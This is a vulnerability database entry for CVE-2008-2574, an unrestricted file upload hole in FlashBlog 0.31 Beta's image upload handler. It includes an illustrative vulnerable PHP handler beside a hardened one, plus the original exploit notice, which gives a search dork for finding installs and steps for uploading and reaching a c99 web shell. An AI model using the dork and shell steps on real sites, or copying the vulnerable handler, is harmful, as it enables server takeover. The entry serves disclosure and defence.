flashblog admin/Editor/imgupload.php unrestricted file upload vulnerability

Vulnerability ID 1115343 Vulnerability type Input validation
Published 2008-06-03 Updated 2008-06-06
CVE ID CVE-2008-2574 CNNVD-ID CNNVD-200806-121
Platform PHP CVSS score 7.5
|Sources
https://www.exploit-db.com/exploits/5728
https://www.securityfocus.com/bid/84988
https://cxsecurity.com/issue/WLB-2008050025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-121
|Details
admin/Editor/imgupload.php in FlashBlog 0.31 Beta 2 has an unrestricted file upload vulnerability: the handler does not restrict the type or name of the uploaded file and stores it in the web-served directory tus_imagenes/. A remote attacker can upload a file with a .php extension and then execute arbitrary code on the server by requesting that file directly from tus_imagenes/.
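The following is an added illustration, not code from FlashBlog (this page does not reproduce imgupload.php): the upload pattern the advisory describes, written as a minimal handler, next to a hardened version of the same handler. The form field name `imagen`, the session key `admin`, the error messages and the relative path from admin/Editor/ to tus_imagenes/ are assumptions; only the handler location and the tus_imagenes/ target directory come from the advisory.

```php
<?php
// Added example, not FlashBlog's own code. The field name 'imagen', the
// session key 'admin' and the relative path to tus_imagenes/ are assumed.

// --- Pattern the advisory describes (CVE-2008-2574) ---
// The client-supplied file name is trusted and the file is written straight
// into a directory the web server serves and runs PHP from. A file named
// c99.php therefore lands as tus_imagenes/c99.php and executes on the next
// GET request to it.
function upload_unrestricted(array $file, string $dir): string
{
    $dest = $dir . '/' . basename($file['name']);
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// --- Hardened handler ---
// Type is decided from file content, the stored name is chosen by the
// server, and the extension is taken from the detected type, never from
// the client.
function upload_image_hardened(array $file, string $dir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // getimagesize() inspects the bytes, so a renamed .php file is rejected.
    $info = getimagesize($file['tmp_name']);
    if ($info === false) {
        throw new RuntimeException('not an image');
    }
    $allowed = [
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
        IMAGETYPE_GIF  => 'gif',
    ];
    if (!isset($allowed[$info[2]])) {
        throw new RuntimeException('image type not allowed');
    }
    // Random server-chosen name: no user-controlled characters, no double
    // extensions, no path traversal.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    $dest = $dir . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

// An upload handler under admin/ should also require an authenticated
// admin session before touching $_FILES at all (assumed session key).
session_start();
if (empty($_SESSION['admin'])) {
    http_response_code(403);
    exit;
}
$uploadDir = __DIR__ . '/../../tus_imagenes';   // assumed relative path
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['imagen'])) {
    try {
        $stored = upload_image_hardened($_FILES['imagen'], $uploadDir);
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Even with the hardened handler, a valid image can still carry PHP code after its header (a polyglot), so the fix is only complete when the web server is also told never to execute scripts from tus_imagenes/ (for Apache, for example, disabling the PHP handler for that directory); the server-chosen .jpg/.png/.gif extension then never reaches an interpreter. A quick check for a deployed instance is to confirm that a direct request for a .php name under tus_imagenes/ is either refused or served as a plain download rather than executed.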
|Exploit
FlashBlog beta0.31 Remote File Upload Vulnerability

# Author : ilker kandemir a.k.a MEFISTO  

# Dork : inurl:flashblog.html  or  inurl:/flashblog/

# Website : www.dumenci.net, www.coderx.org

http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[site.com]/tus_imagenes/c99.php ==>>> your address

Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz

# milw0rm.com [2008-06-03]
|Affected products
FlashBlog FlashBlog 0.31 BETA
|References

Source: XF
Name: flashblog-imgupload-file-upload (42820)
Link: http://xforce.iss.net/xforce/xfdb/42820
Source: BUGTRAQ
Name: 20080529 FlashBlog Remote File Upload Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/492738/100/0/threaded
Source: MILW0RM
Name: 5728
Link: http://www.milw0rm.com/exploits/5728
Source: MISC
Name: http://www.flashblog.org
Link: http://www.flashblog.org
Source: MISC
Link: http://www.dumenci.net/web-action/flashblog-beta0.31-remote-file-upload-vulnerability.html
Source: SREASON
Name: 3928
Link: http://securityreason.com/securityalert/3928